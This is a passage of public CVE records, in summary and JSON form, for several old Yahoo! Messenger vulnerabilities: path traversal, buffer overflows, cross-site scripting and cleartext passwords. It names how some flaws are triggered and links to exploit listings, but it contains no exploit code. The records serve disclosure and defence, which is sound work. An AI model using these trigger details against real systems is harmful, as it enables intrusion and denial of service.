          "shortName": "CVE"
        },
        "references": [
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://www.shinnai.altervista.org/exploits/txt/TXT_KJDPaI2IlM5P9PP6N6dI.html"
          },
          {
            "name": "4428",
            "tags": [
              "exploit",
              "x_refsource_EXPLOIT-DB",
              "x_transferred"
            ],
            "url": "https://www.exploit-db.com/exploits/4428"
          },
          {
            "name": "yahoo-messenger-ft60-code-execution(36694)",
            "tags": [
              "vdb-entry",
              "x_refsource_XF",
              "x_transferred"
            ],
            "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/36694"
          },
          {
            "name": "38296",
            "tags": [
              "vdb-entry",
              "x_refsource_OSVDB",
              "x_transferred"
            ],
            "url": "http://osvdb.org/38296"
          },
          {
            "name": "25727",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/25727"
          },
          {
            "name": "1018715",
            "tags": [
              "vdb-entry",
              "x_refsource_SECTRACK",
              "x_transferred"
            ],
            "url": "http://www.securitytracker.com/id?1018715"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2007-09-19T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Absolute path traversal vulnerability in a certain ActiveX control in the CYFT object in ft60.dll in Yahoo! Messenger 8.1.0.421 allows remote attackers to force a download, and create or overwrite arbitrary files via a full pathname in the second argument to the GetFile method."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2017-09-28T12:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://www.shinnai.altervista.org/exploits/txt/TXT_KJDPaI2IlM5P9PP6N6dI.html"
        },
        {
          "name": "4428",
          "tags": [
            "exploit",
            "x_refsource_EXPLOIT-DB"
          ],
          "url": "https://www.exploit-db.com/exploits/4428"
        },
        {
          "name": "yahoo-messenger-ft60-code-execution(36694)",
          "tags": [
            "vdb-entry",
            "x_refsource_XF"
          ],
          "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/36694"
        },
        {
          "name": "38296",
          "tags": [
            "vdb-entry",
            "x_refsource_OSVDB"
          ],
          "url": "http://osvdb.org/38296"
        },
        {
          "name": "25727",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/25727"
        },
        {
          "name": "1018715",
          "tags": [
            "vdb-entry",
            "x_refsource_SECTRACK"
          ],
          "url": "http://www.securitytracker.com/id?1018715"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2007-5017",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Absolute path traversal vulnerability in a certain ActiveX control in the CYFT object in ft60.dll in Yahoo! Messenger 8.1.0.421 allows remote attackers to force a download, and create or overwrite arbitrary files via a full pathname in the second argument to the GetFile method."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "http://www.shinnai.altervista.org/exploits/txt/TXT_KJDPaI2IlM5P9PP6N6dI.html",
              "refsource": "MISC",
              "url": "http://www.shinnai.altervista.org/exploits/txt/TXT_KJDPaI2IlM5P9PP6N6dI.html"
            },
            {
              "name": "4428",
              "refsource": "EXPLOIT-DB",
              "url": "https://www.exploit-db.com/exploits/4428"
            },
            {
              "name": "yahoo-messenger-ft60-code-execution(36694)",
              "refsource": "XF",
              "url": "https://exchange.xforce.ibmcloud.com/vulnerabilities/36694"
            },
            {
              "name": "38296",
              "refsource": "OSVDB",
              "url": "http://osvdb.org/38296"
            },
            {
              "name": "25727",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/25727"
            },
            {
              "name": "1018715",
              "refsource": "SECTRACK",
              "url": "http://www.securitytracker.com/id?1018715"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2007-5017",
    "datePublished": "2007-09-20T21:00:00",
    "dateReserved": "2007-09-20T00:00:00",
    "dateUpdated": "2024-08-07T15:17:28.168Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2005-0242 (GCVE-0-2005-0242)
Vulnerability from cvelistv5
Published
2005-02-18 05:00
Modified
2024-08-07 21:05
Severity ?
CWE
  • n/a
Summary
The Audio Setup Wizard (asw.dll) in Yahoo! Messenger 6.0.0.1750, and possibly other versions, allows attackers to execute arbitrary code by placing a malicious ping.exe program into the Messenger program directory, which is installed with weak default permissions.
References
http://secunia.com/advisories/11815 (third-party-advisory, x_refsource_SECUNIA)
http://secunia.com/secunia_research/2004-6/advisory/ (x_refsource_MISC)
http://messenger.yahoo.com/security/update6.html (x_refsource_CONFIRM)
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T21:05:25.268Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "11815",
            "tags": [
              "third-party-advisory",
              "x_refsource_SECUNIA",
              "x_transferred"
            ],
            "url": "http://secunia.com/advisories/11815"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://secunia.com/secunia_research/2004-6/advisory/"
          },
          {
            "tags": [
              "x_refsource_CONFIRM",
              "x_transferred"
            ],
            "url": "http://messenger.yahoo.com/security/update6.html"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2005-02-18T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "The Audio Setup Wizard (asw.dll) in Yahoo! Messenger 6.0.0.1750, and possibly other versions, allows attackers to arbitrary code by placing a malicious ping.exe program into the Messenger program directory, which is installed with weak default permissions."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2021-06-15T16:38:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "11815",
          "tags": [
            "third-party-advisory",
            "x_refsource_SECUNIA"
          ],
          "url": "http://secunia.com/advisories/11815"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://secunia.com/secunia_research/2004-6/advisory/"
        },
        {
          "tags": [
            "x_refsource_CONFIRM"
          ],
          "url": "http://messenger.yahoo.com/security/update6.html"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2005-0242",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "The Audio Setup Wizard (asw.dll) in Yahoo! Messenger 6.0.0.1750, and possibly other versions, allows attackers to arbitrary code by placing a malicious ping.exe program into the Messenger program directory, which is installed with weak default permissions."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "11815",
              "refsource": "SECUNIA",
              "url": "http://secunia.com/advisories/11815"
            },
            {
              "name": "http://secunia.com/secunia_research/2004-6/advisory/",
              "refsource": "MISC",
              "url": "http://secunia.com/secunia_research/2004-6/advisory/"
            },
            {
              "name": "http://messenger.yahoo.com/security/update6.html",
              "refsource": "CONFIRM",
              "url": "http://messenger.yahoo.com/security/update6.html"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2005-0242",
    "datePublished": "2005-02-18T05:00:00",
    "dateReserved": "2005-02-08T00:00:00",
    "dateUpdated": "2024-08-07T21:05:25.268Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2002-0322 (GCVE-0-2002-0322)
Vulnerability from cvelistv5
Published
2002-05-03 04:00
Modified
2024-08-08 02:42
Severity ?
CWE
  • n/a
Summary
Yahoo! Messenger 4.0 sends user passwords in cleartext, which could allow remote attackers to gain privileges of other users via sniffing.
References
http://marc.info/?l=bugtraq&m=101466489113920&w=2 (mailing-list, x_refsource_BUGTRAQ)
http://www.securityfocus.com/bid/4173 (vdb-entry, x_refsource_BID)
http://marc.info/?l=bugtraq&m=101467298107635&w=2 (mailing-list, x_refsource_BUGTRAQ)
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-08T02:42:29.243Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "20020223 Re: Remote crashes in Yahoo messenger",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://marc.info/?l=bugtraq\u0026m=101466489113920\u0026w=2"
          },
          {
            "name": "4173",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/4173"
          },
          {
            "name": "20020223 Re: Re: Remote crashes in Yahoo messenger",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://marc.info/?l=bugtraq\u0026m=101467298107635\u0026w=2"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2002-02-23T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Yahoo! Messenger 4.0 sends user passwords in cleartext, which could allow remote attackers to gain privileges of other users via sniffing."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2016-10-17T13:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "20020223 Re: Remote crashes in Yahoo messenger",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://marc.info/?l=bugtraq\u0026m=101466489113920\u0026w=2"
        },
        {
          "name": "4173",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/4173"
        },
        {
          "name": "20020223 Re: Re: Remote crashes in Yahoo messenger",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://marc.info/?l=bugtraq\u0026m=101467298107635\u0026w=2"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2002-0322",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Yahoo! Messenger 4.0 sends user passwords in cleartext, which could allow remote attackers to gain privileges of other users via sniffing."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "20020223 Re: Remote crashes in Yahoo messenger",
              "refsource": "BUGTRAQ",
              "url": "http://marc.info/?l=bugtraq\u0026m=101466489113920\u0026w=2"
            },
            {
              "name": "4173",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/4173"
            },
            {
              "name": "20020223 Re: Re: Remote crashes in Yahoo messenger",
              "refsource": "BUGTRAQ",
              "url": "http://marc.info/?l=bugtraq\u0026m=101467298107635\u0026w=2"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2002-0322",
    "datePublished": "2002-05-03T04:00:00",
    "dateReserved": "2002-05-01T00:00:00",
    "dateUpdated": "2024-08-08T02:42:29.243Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2007-0868 (GCVE-0-2007-0868)
Vulnerability from cvelistv5
Published
2007-02-09 19:00
Modified
2024-08-07 12:34
Severity ?
CWE
  • n/a
Summary
Unspecified vulnerability in the Chat Room functionality in Yahoo! Messenger 8.1.0.239 and earlier allows remote attackers to cause a denial of service via unspecified vectors. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
References
http://www.securityfocus.com/bid/22407 (vdb-entry, x_refsource_BID)
http://osvdb.org/34696 (vdb-entry, x_refsource_OSVDB)
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T12:34:21.130Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "22407",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/22407"
          },
          {
            "name": "34696",
            "tags": [
              "vdb-entry",
              "x_refsource_OSVDB",
              "x_transferred"
            ],
            "url": "http://osvdb.org/34696"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2007-02-05T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Unspecified vulnerability in the Chat Room functionality in Yahoo! Messenger 8.1.0.239 and earlier allows remote attackers to cause a denial of service via unspecified vectors.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2008-11-15T10:00:00",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "22407",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/22407"
        },
        {
          "name": "34696",
          "tags": [
            "vdb-entry",
            "x_refsource_OSVDB"
          ],
          "url": "http://osvdb.org/34696"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2007-0868",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Unspecified vulnerability in the Chat Room functionality in Yahoo! Messenger 8.1.0.239 and earlier allows remote attackers to cause a denial of service via unspecified vectors.  NOTE: the provenance of this information is unknown; the details are obtained solely from third party information."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "22407",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/22407"
            },
            {
              "name": "34696",
              "refsource": "OSVDB",
              "url": "http://osvdb.org/34696"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2007-0868",
    "datePublished": "2007-02-09T19:00:00",
    "dateReserved": "2007-02-09T00:00:00",
    "dateUpdated": "2024-08-07T12:34:21.130Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2003-1135 (GCVE-0-2003-1135)
Vulnerability from cvelistv5
Published
2005-05-10 04:00
Modified
2024-09-16 16:38
Severity ?
CWE
  • n/a
Summary
Buffer overflow in Yahoo! Messenger 5.6 allows remote attackers to cause a denial of service (crash) via a file send request (sendfile) with a large number of "%" (percent) characters after the Yahoo ID.
References
http://www.securityfocus.com/archive/1/342472 (mailing-list, x_refsource_BUGTRAQ)
http://www.securityfocus.com/bid/8894 (vdb-entry, x_refsource_BID)
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-08T02:19:44.703Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "20031026 Buffer Overflow in Yahoo messenger Client",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/342472"
          },
          {
            "name": "8894",
            "tags": [
              "vdb-entry",
              "x_refsource_BID",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/bid/8894"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "descriptions": [
        {
          "lang": "en",
          "value": "Buffer overflow in Yahoo! Messenger 5.6 allows remote attackers to cause a denial of service (crash) via a file send request (sendfile) with a large number of \"%\" (percent) characters after the Yahoo ID."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2005-05-10T04:00:00Z",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "20031026 Buffer Overflow in Yahoo messenger Client",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/342472"
        },
        {
          "name": "8894",
          "tags": [
            "vdb-entry",
            "x_refsource_BID"
          ],
          "url": "http://www.securityfocus.com/bid/8894"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2003-1135",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Buffer overflow in Yahoo! Messenger 5.6 allows remote attackers to cause a denial of service (crash) via a file send request (sendfile) with a large number of \"%\" (percent) characters after the Yahoo ID."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "20031026 Buffer Overflow in Yahoo messenger Client",
              "refsource": "BUGTRAQ",
              "url": "http://www.securityfocus.com/archive/1/342472"
            },
            {
              "name": "8894",
              "refsource": "BID",
              "url": "http://www.securityfocus.com/bid/8894"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2003-1135",
    "datePublished": "2005-05-10T04:00:00Z",
    "dateReserved": "2005-05-04T00:00:00Z",
    "dateUpdated": "2024-09-16T16:38:22.110Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2006-4975 (GCVE-0-2006-4975)
Vulnerability from cvelistv5
Published
2006-09-25 01:00
Modified
2024-08-07 19:32
Severity ?
CWE
  • n/a
Summary
Yahoo! Messenger for WAP permits saving messages that contain JavaScript, which allows user-assisted remote attackers to inject arbitrary web script or HTML via a URL at the online service.
References
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-07T19:32:22.820Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "1626",
            "tags": [
              "third-party-advisory",
              "x_refsource_SREASON",
              "x_transferred"
            ],
            "url": "http://securityreason.com/securityalert/1626"
          },
          {
            "name": "20060917 [ECHO_ADV_47$2006] WAP Y! Messenger Cross-Site Scripting Vulnerability",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://www.securityfocus.com/archive/1/446414/100/0/threaded"
          },
          {
            "tags": [
              "x_refsource_MISC",
              "x_transferred"
            ],
            "url": "http://advisories.echo.or.id/adv/adv47-theday-2006.txt"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2006-09-17T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Yahoo! Messenger for WAP permits saving messages that contain JavaScript, which allows user-assisted remote attackers to inject arbitrary web script or HTML via a URL at the online service."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2018-10-17T20:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "1626",
          "tags": [
            "third-party-advisory",
            "x_refsource_SREASON"
          ],
          "url": "http://securityreason.com/securityalert/1626"
        },
        {
          "name": "20060917 [ECHO_ADV_47$2006] WAP Y! Messenger Cross-Site Scripting Vulnerability",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://www.securityfocus.com/archive/1/446414/100/0/threaded"
        },
        {
          "tags": [
            "x_refsource_MISC"
          ],
          "url": "http://advisories.echo.or.id/adv/adv47-theday-2006.txt"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2006-4975",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Yahoo! Messenger for WAP permits saving messages that contain JavaScript, which allows user-assisted remote attackers to inject arbitrary web script or HTML via a URL at the online service."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
                  "value": "n/a"
                }
              ]
            }
          ]
        },
        "references": {
          "reference_data": [
            {
              "name": "1626",
              "refsource": "SREASON",
              "url": "http://securityreason.com/securityalert/1626"
            },
            {
              "name": "20060917 [ECHO_ADV_47$2006] WAP Y! Messenger Cross-Site Scripting Vulnerability",
              "refsource": "BUGTRAQ",
              "url": "http://www.securityfocus.com/archive/1/446414/100/0/threaded"
            },
            {
              "name": "http://advisories.echo.or.id/adv/adv47-theday-2006.txt",
              "refsource": "MISC",
              "url": "http://advisories.echo.or.id/adv/adv47-theday-2006.txt"
            }
          ]
        }
      }
    }
  },
  "cveMetadata": {
    "assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
    "assignerShortName": "mitre",
    "cveId": "CVE-2006-4975",
    "datePublished": "2006-09-25T01:00:00",
    "dateReserved": "2006-09-24T00:00:00",
    "dateUpdated": "2024-08-07T19:32:22.820Z",
    "state": "PUBLISHED"
  },
  "dataType": "CVE_RECORD",
  "dataVersion": "5.1"
}

CVE-2002-1665 (GCVE-0-2002-1665)
Vulnerability from cvelistv5
Published
2005-05-28 04:00
Modified
2024-08-08 03:34
Severity ?
CWE
  • n/a
Summary
Buffer overflow in Yahoo! Messenger before February 2002 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long set_buddygrp field.
References
http://www.cert.org/advisories/CA-2002-16.html — third-party-advisory, x_refsource_CERT
http://marc.info/?l=bugtraq&m=101439616623230&w=2 — mailing-list, x_refsource_BUGTRAQ
http://www.kb.cert.org/vuls/id/755755 — third-party-advisory, x_refsource_CERT-VN
Impacted products
Vendor Product Version
n/a n/a Version: n/a


{
  "containers": {
    "adp": [
      {
        "providerMetadata": {
          "dateUpdated": "2024-08-08T03:34:55.665Z",
          "orgId": "af854a3a-2127-422b-91ae-364da2661108",
          "shortName": "CVE"
        },
        "references": [
          {
            "name": "CA-2002-16",
            "tags": [
              "third-party-advisory",
              "x_refsource_CERT",
              "x_transferred"
            ],
            "url": "http://www.cert.org/advisories/CA-2002-16.html"
          },
          {
            "name": "20020221 Remote crashes in Yahoo messenger",
            "tags": [
              "mailing-list",
              "x_refsource_BUGTRAQ",
              "x_transferred"
            ],
            "url": "http://marc.info/?l=bugtraq\u0026m=101439616623230\u0026w=2"
          },
          {
            "name": "VU#755755",
            "tags": [
              "third-party-advisory",
              "x_refsource_CERT-VN",
              "x_transferred"
            ],
            "url": "http://www.kb.cert.org/vuls/id/755755"
          }
        ],
        "title": "CVE Program Container"
      }
    ],
    "cna": {
      "affected": [
        {
          "product": "n/a",
          "vendor": "n/a",
          "versions": [
            {
              "status": "affected",
              "version": "n/a"
            }
          ]
        }
      ],
      "datePublic": "2002-02-21T00:00:00",
      "descriptions": [
        {
          "lang": "en",
          "value": "Buffer overflow in Yahoo! Messenger before February 2002 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long set_buddygrp field."
        }
      ],
      "problemTypes": [
        {
          "descriptions": [
            {
              "description": "n/a",
              "lang": "en",
              "type": "text"
            }
          ]
        }
      ],
      "providerMetadata": {
        "dateUpdated": "2016-10-17T13:57:01",
        "orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
        "shortName": "mitre"
      },
      "references": [
        {
          "name": "CA-2002-16",
          "tags": [
            "third-party-advisory",
            "x_refsource_CERT"
          ],
          "url": "http://www.cert.org/advisories/CA-2002-16.html"
        },
        {
          "name": "20020221 Remote crashes in Yahoo messenger",
          "tags": [
            "mailing-list",
            "x_refsource_BUGTRAQ"
          ],
          "url": "http://marc.info/?l=bugtraq\u0026m=101439616623230\u0026w=2"
        },
        {
          "name": "VU#755755",
          "tags": [
            "third-party-advisory",
            "x_refsource_CERT-VN"
          ],
          "url": "http://www.kb.cert.org/vuls/id/755755"
        }
      ],
      "x_legacyV4Record": {
        "CVE_data_meta": {
          "ASSIGNER": "cve@mitre.org",
          "ID": "CVE-2002-1665",
          "STATE": "PUBLIC"
        },
        "affects": {
          "vendor": {
            "vendor_data": [
              {
                "product": {
                  "product_data": [
                    {
                      "product_name": "n/a",
                      "version": {
                        "version_data": [
                          {
                            "version_value": "n/a"
                          }
                        ]
                      }
                    }
                  ]
                },
                "vendor_name": "n/a"
              }
            ]
          }
        },
        "data_format": "MITRE",
        "data_type": "CVE",
        "data_version": "4.0",
        "description": {
          "description_data": [
            {
              "lang": "eng",
              "value": "Buffer overflow in Yahoo! Messenger before February 2002 allows remote attackers to cause a denial of service (crash) and possibly execute arbitrary code via a long set_buddygrp field."
            }
          ]
        },
        "problemtype": {
          "problemtype_data": [
            {
              "description": [
                {
                  "lang": "eng",
